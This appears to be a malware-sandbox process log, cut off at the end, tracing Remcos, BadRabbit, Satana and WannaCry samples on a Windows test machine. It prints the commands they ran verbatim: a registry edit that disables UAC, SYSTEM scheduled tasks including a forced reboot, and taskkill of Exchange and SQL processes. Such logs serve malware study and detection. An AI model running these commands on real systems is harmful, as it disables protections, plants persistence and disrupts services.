  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
  2⤵
  PID:3224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
  2⤵
  PID:964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3408 /prefetch:8
  2⤵
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6212 /prefetch:8
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:772
- C:\Users\Admin\Downloads\Remcos.exe
  "C:\Users\Admin\Downloads\Remcos.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3088
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
    3⤵
    PID:208
  - - C:\Windows\SysWOW64\PING.EXE
      PING 127.0.0.1 -n 2
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1472
  - - C:\Windows\SysWOW64\Userdata\Userdata.exe
      "C:\Windows\SysWOW64\Userdata\Userdata.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      PID:3876
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4444
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        
        PID:4112
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6640 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5064
- C:\Users\Admin\Downloads\Remcos.exe
  "C:\Users\Admin\Downloads\Remcos.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  PID:772
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:1176
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2268
- - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:4296
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:2428
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
  2⤵
  PID:716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2212 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6604 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5068
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:4276
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3432
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Delete /F /TN rhaegal
      4⤵
      PID:1000
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /F /TN rhaegal
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4516
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2717780437 && exit"
      4⤵
      PID:3644
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2717780437 && exit"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1912
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 10:30:00
      4⤵
      PID:2268
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 10:30:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4828
  - - C:\Windows\4973.tmp
      "C:\Windows\4973.tmp" \\.\pipe\{E1543952-2B2C-4B0C-89A3-9BB37E057267}
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
  2⤵
  PID:3372
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:1908
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1648
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:4836
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6560 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:720
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2312
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2236
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2384
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4284
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2792
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:376
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2168
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4332
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3436
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4756
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:4060
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:64
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:3684
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:1424
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6788 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4628
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1908
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 380
      4⤵
      Program crash
      PID:376
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4812
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:3156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 340
      4⤵
      Program crash
      PID:4504
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2784
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:4256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 340
      4⤵
      Program crash
      PID:4572
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1788
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:8
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 348
      4⤵
      Program crash
      PID:2892
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3700
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:4012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 340
      4⤵
      Program crash
      PID:2384
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4076
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:2860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 340
      4⤵
      Program crash
      PID:1464
- C:\Users\Admin\Downloads\Satana.exe
  "C:\Users\Admin\Downloads\Satana.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3856
- - C:\Users\Admin\Downloads\Satana.exe
    "C:\Users\Admin\Downloads\Satana.exe"
    3⤵
    - Executes dropped EXE
    PID:4000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 348
      4⤵
      Program crash
      PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5308 /prefetch:8
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,1227033257453495626,8729302283363354276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7000 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4628
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 204121722852857.bat
    3⤵
    PID:3164
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:2100
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3852
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    PID:3608
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1532
    - - C:\Windows\SysWOW64\cmd.exe
        
